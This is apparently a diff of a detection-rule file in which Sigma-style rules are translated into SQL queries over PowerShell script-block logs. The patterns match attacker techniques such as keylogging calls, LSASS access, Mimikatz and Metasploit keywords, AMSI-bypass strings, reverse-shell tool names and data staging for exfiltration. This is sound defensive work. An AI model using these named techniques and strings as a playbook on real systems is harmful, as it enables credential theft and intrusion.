"falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%System.DirectoryServices.Protocols.LdapDirectoryIdentifier%' ESCAPE '\\' OR ScriptBlockText LIKE '%System.Net.NetworkCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%System.DirectoryServices.Protocols.LdapConnection%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[System.Math]::%' ESCAPE '\\' AND ScriptBlockText LIKE '%[IO.FileMode]::%' ESCAPE '\\' AND ScriptBlockText LIKE '%BinaryWriter%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x52%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x49%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x46%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x57%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x41%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x56%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x45%' ESCAPE '\\' AND ScriptBlockText LIKE '%0xAC%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_networkcredential.yml" + "filename": "posh_ps_audio_exfiltration.yml" }, { - "title": "Powershell WMI Persistence", - "id": "9e07f6e7-83aa-45c6-998e-0af26efd0a85", + "title": "Powershell Trigger Profiles by Add_Content", + "id": "05b3e303-faf0-4f4a-9b30-46cc13e69152", "status": "test", - "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.", + "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles.", "author": "frack113", "tags": [ "attack.privilege_escalation", - "attack.t1546.003" + "attack.t1546.013" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%New-CimInstance %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namespace root/subscription %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName \\_\\_EventFilter %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Property %' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-CimInstance %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namespace root/subscription %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName CommandLineEventConsumer %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Property %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\' AND ScriptBlockText LIKE '%$profile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Value%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"\"%' ESCAPE '\\'))" ], - "filename": "posh_ps_wmi_persistence.yml" + "filename": "posh_ps_trigger_profiles.yml" }, { - "title": "Powershell Keylogging", - "id": "34f90d3c-c297-49e9-b26d-911b05a4866c", - "status": "experimental", - "description": "Adversaries may log user keystrokes to intercept credentials as the user types them.", - "author": "frack113", + "title": "Powershell Add Name Resolution Policy Table Rule", + "id": "4368354e-1797-463c-bc39-a309effbe8d7", + "status": "test", + "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", + "author": "Borna Talebi", "tags": [ - "attack.collection", - "attack.t1056.001" + "attack.impact", + "attack.t1565" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR (ScriptBlockText LIKE '%Get-ProcAddress user32.dll GetAsyncKeyState%' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-ProcAddress user32.dll GetForegroundWindow%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-DnsClientNrptRule%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namesp%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSe%' ESCAPE '\\')" ], - "filename": "posh_ps_keylogging.yml" + "filename": "posh_ps_add_dnsclient_rule.yml" }, { - "title": "SyncAppvPublishingServer Execution to Bypass Powershell Restriction", - "id": "dddfebae-c46f-439c-af7a-fdb6bde90218", + "title": "PowerShell Get-Process LSASS in ScriptBlock", + "id": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", "status": "test", - "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", - "author": "Ensar Şamil, @sblmsrsn, OSCD Community", + "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "App-V clients" + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%SyncAppvPublishingServer.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process lsass%' ESCAPE '\\')" ], - "filename": "posh_ps_syncappvpublishingserver_exe.yml" + "filename": "posh_ps_susp_getprocess_lsass.yml" }, { - "title": "User Discovery And Export Via Get-ADUser Cmdlet - PowerShell", - "id": "c2993223-6da8-4b1a-88ee-668b8bf315e9", - "status": "experimental", - "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Extracting Information with PowerShell", + "id": "bd5971a7-626d-46ab-8176-ed643f694f68", + "status": "test", + "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.\nThese can be files created by users to store their own credentials, shared credential stores for a group of individuals,\nconfiguration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.credential_access", + "attack.t1552.001" ], "falsepositives": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADUser %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Filter \\*' ESCAPE '\\' AND (ScriptBlockText LIKE '% > %' ESCAPE '\\' OR ScriptBlockText LIKE '% | Select %' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-File%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Content%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%ls%' ESCAPE '\\' AND ScriptBlockText LIKE '% -R%' ESCAPE '\\' AND ScriptBlockText LIKE '%select-string %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Pattern %' ESCAPE '\\')" ], - "filename": "posh_ps_user_discovery_get_aduser.yml" + "filename": "posh_ps_susp_extracting.yml" }, { - "title": "Suspicious TCP Tunnel Via PowerShell Script", - "id": "bd33d2aa-497e-4651-9893-5c5364646595", + "title": "Change User Agents with WebRequest", + "id": "d4488827-73af-4f8d-9244-7b7662ef046e", "status": "experimental", - "description": "Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.\nCommands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\n", + "author": "frack113", "tags": [ "attack.command_and_control", - "attack.t1090" + "attack.t1071.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[System.Net.HttpWebRequest]%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Net.Sockets.TcpListener%' ESCAPE '\\' AND ScriptBlockText LIKE '%AcceptTcpClient%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '%-UserAgent %' ESCAPE '\\')" ], - "filename": "posh_ps_susp_proxy_scripts.yml" + "filename": "posh_ps_susp_invoke_webrequest_useragent.yml" }, { - "title": "Potential Persistence Via Security Descriptors - ScriptBlock", - "id": "2f77047c-e6e9-4c11-b088-a3de399524cd", - "status": "experimental", - "description": "Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Data Compressed - PowerShell", + "id": "6dc5d284-69ea-42cf-9311-fb1c3932a69a", + "status": "test", + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation" + "attack.exfiltration", + "attack.t1560" ], "falsepositives": [ - "Unknown" + "Highly likely if archive operations are done via PowerShell." ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_Trustee%' ESCAPE '\\' AND ScriptBlockText LIKE '%win32\\_Ace%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AccessMask%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AceType%' ESCAPE '\\' AND ScriptBlockText LIKE '%.SetSecurityDescriptor%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Lsa\\\\JD%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Skew1%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\GBG%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%-Recurse%' ESCAPE '\\' AND ScriptBlockText LIKE '%|%' ESCAPE '\\' AND ScriptBlockText LIKE '%Compress-Archive%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_ace_tampering.yml" + "filename": "posh_ps_data_compressed.yml" }, { - "title": "Malicious ShellIntel PowerShell Commandlets", - "id": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", + "title": "Malicious PowerShell Keywords", + "id": "f62176f3-8128-4faa-bf6c-83261322e5eb", "status": "test", - "description": "Detects Commandlet names from ShellIntel exploitation scripts.", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects keywords from well-known PowerShell exploitation frameworks", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ "attack.execution", "attack.t1059.001" @@ -7597,46 +7160,47 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-GPOLinks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Potato%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%IMAGE\\_NT\\_OPTIONAL\\_HDR64\\_MAGIC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Win32.UnsafeNativeMethods%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory.Invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%SE\\_PRIVILEGE\\_ENABLED%' ESCAPE '\\' OR ScriptBlockText LIKE '%LSA\\_UNICODE\\_STRING%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%PAGE\\_EXECUTE\\_READ%' ESCAPE '\\' OR ScriptBlockText LIKE '%SECURITY\\_DELEGATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ADJUST\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ALL\\_ACCESS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ASSIGN\\_PRIMARY%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_DUPLICATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ELEVATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_IMPERSONATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_INFORMATION\\_CLASS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_QUERY%' ESCAPE '\\' OR ScriptBlockText LIKE '%Metasploit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Mimikatz%' ESCAPE '\\'))" ], - "filename": "posh_ps_shellintel_malicious_commandlets.yml" + "filename": "posh_ps_malicious_keywords.yml" }, { - "title": "Suspicious IO.FileStream", - "id": "70ad982f-67c8-40e0-a955-b920c2fa05cb", + "title": "Enable Windows Remote Management", + "id": "991a9744-f2f0-44f2-bd33-9092eba17dc3", "status": "test", - "description": "Open a handle on the drive volume via the \\\\.\\ DOS device path specifier and perform direct access read of the first few bytes of the volume.", + "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1070.003" + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%IO.FileStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\\\\\.\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Enable-PSRemoting %' ESCAPE '\\')" ], - "filename": "posh_ps_susp_iofilestream.yml" + "filename": "posh_ps_enable_psremoting.yml" }, { - "title": "PowerShell Hotfix Enumeration", - "id": "f5d1def8-1de0-4a0e-9794-1f6f27dd605c", - "status": "experimental", - "description": "Detects call to \"Win32_QuickFixEngineering\" in order to enumerate installed hotfixes often used in \"enum\" scripts by attackers", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Export-PfxCertificate", + "id": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", + "status": "test", + "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery" + "attack.credential_access", + "attack.t1552.004" ], "falsepositives": [ - "Legitimate administration scripts" + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Win32\\_QuickFixEngineering%' ESCAPE '\\' AND ScriptBlockText LIKE '%HotFixID%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Export-PfxCertificate%' ESCAPE '\\' AND NOT ((ScriptBlockText LIKE '%CmdletsToExport = @(%' ESCAPE '\\')))" ], - "filename": "posh_ps_hotfix_enum.yml" + "filename": "posh_ps_susp_export_pfxcertificate.yml" }, { "title": "Powershell MsXml COM Object", @@ -7658,325 +7222,390 @@ "filename": "posh_ps_msxml_com.yml" }, { - "title": "Powershell Local Email Collection", - "id": "2837e152-93c8-43d2-85ba-c3cd3c2ae614", - "status": "test", - "description": "Adversaries may target user email on local systems to collect sensitive information.\nFiles containing email data can be acquired from a users local system, such as Outlook storage or cache files.\n", - "author": "frack113", + "title": "Abuse of Service Permissions to Hide Services Via Set-Service - PS", + "id": "953945c5-22fe-4a92-9f8a-a9edc1e522da", + "status": "experimental", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1114.001" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Unknown" + "Rare intended use of hidden services", + "Rare FP could occur due to the non linearity of the ScriptBlockText log" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-Inbox.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Office.Interop.Outlook%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Office.Interop.Outlook.olDefaultFolders%' ESCAPE '\\' OR ScriptBlockText LIKE '%-comobject outlook.application%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%DCLCWPDTSD%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_mail_acces.yml" + "filename": "posh_ps_using_set_service_to_hide_services.yml" }, { - "title": "Winlogon Helper DLL", - "id": "851c506b-6b7c-4ce2-8802-c703009d03c0", + "title": "Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell", + "id": "db885529-903f-4c5d-9864-28fe199e6370", "status": "experimental", - "description": "Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\nRegistry entries in HKLM\\Software[Wow6432Node]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are\nused to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to\nload and execute malicious DLLs and/or executables.\n", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.004" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unknown" + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CurrentVersion\\\\Winlogon%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Set-ItemProperty%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-Item%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADComputer %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Filter \\*' ESCAPE '\\' AND (ScriptBlockText LIKE '% | Select %' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-File%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Content%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\'))" ], - "filename": "posh_ps_winlogon_helper_dll.yml" + "filename": "posh_ps_computer_discovery_get_adcomputer.yml" }, { - "title": "Potential Suspicious Windows Feature Enabled", - "id": "55c925c1-7195-426b-a136-a9396800e29b", + "title": "PSAsyncShell - Asynchronous TCP Reverse Shell", + "id": "afd3df04-948d-46f6-ae44-25966c44b97f", "status": "experimental", - "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", - "author": "frack113", + "description": "Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of the features listed in the rule." + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Enable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%TelnetServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Internet-Explorer-Optional-amd64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TFTP%' ESCAPE '\\' OR ScriptBlockText LIKE '%SMB1Protocol%' ESCAPE '\\' OR ScriptBlockText LIKE '%Client-ProjFS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft-Windows-Subsystem-Linux%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PSAsyncShell%' ESCAPE '\\')" ], - "filename": "posh_ps_enable_susp_windows_optional_feature.yml" + "filename": "posh_ps_psasyncshell.yml" }, { - "title": "Suspicious Mount-DiskImage", - "id": "29e1c216-6408-489d-8a06-ee9d151ef819", - "status": "test", - "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", - "author": "frack113", + "title": "PowerShell ADRecon Execution", + "id": "bf72941a-cba0-41ea-b18c-9aca3925690d", + "status": "experimental", + "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1553.005" + "attack.discovery", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Mount-DiskImage %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ImagePath %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Function Get-ADRExcelComOb%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRDomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%ADRecon-Report.xlsx%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_mount_diskimage.yml" + "filename": "posh_ps_adrecon_execution.yml" }, { - "title": "PowerShell Get-Process LSASS in ScriptBlock", - "id": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", - "status": "test", - "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential AMSI Bypass Using NULL Bits - ScriptBlockLogging", + "id": "fa2559c8-1197-471d-9cdd-05a0273d4522", + "status": "experimental", + "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process lsass%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%if(0){{{0}}}'' -f $(0 -as [char]) +%' ESCAPE '\\' OR ScriptBlockText LIKE '%#%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_getprocess_lsass.yml" + "filename": "posh_ps_amsi_null_bits_bypass.yml" }, { - "title": "Replace Desktop Wallpaper by Powershell", - "id": "c5ac6a1e-9407-45f5-a0ce-ca9a0806a287", + "title": "Malicious ShellIntel PowerShell Commandlets", + "id": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", "status": "test", - "description": "An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users.\nThis may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper\n", - "author": "frack113", + "description": "Detects Commandlet names from ShellIntel exploitation scripts.", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1491.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Get-ItemProperty%' ESCAPE '\\' AND ScriptBlockText LIKE '%Registry::%' ESCAPE '\\' AND ScriptBlockText LIKE '%HKEY\\_CURRENT\\_USER\\\\Control Panel\\\\Desktop\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%WallPaper%' ESCAPE '\\') OR ScriptBlockText LIKE '%SystemParametersInfo(20,0,%,3)%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-GPOLinks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Potato%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_wallpaper.yml" + "filename": "posh_ps_shellintel_malicious_commandlets.yml" }, { - "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Script", - "id": "b7a3c9a3-09ea-4934-8864-6a32cacd98d9", + "title": "Potential WinAPI Calls Via PowerShell Scripts", + "id": "03d83090-8cba-44a0-b02f-0b756a050306", "status": "experimental", - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "description": "Detects use of WinAPI Functions in PowerShell scripts", + "author": "Nikita Nazarov, oscd.community, Tim Shelton", + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.t1106" + ], + "falsepositives": [ + "Carbon PowerShell Module (https://github.com/webmd-health-services/Carbon)" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%AddSecurityPackage%' ESCAPE '\\' OR ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%Advapi32%' ESCAPE '\\' OR ScriptBlockText LIKE '%CloseHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateRemoteThread%' ESCAPE '\\' OR ScriptBlockText LIKE 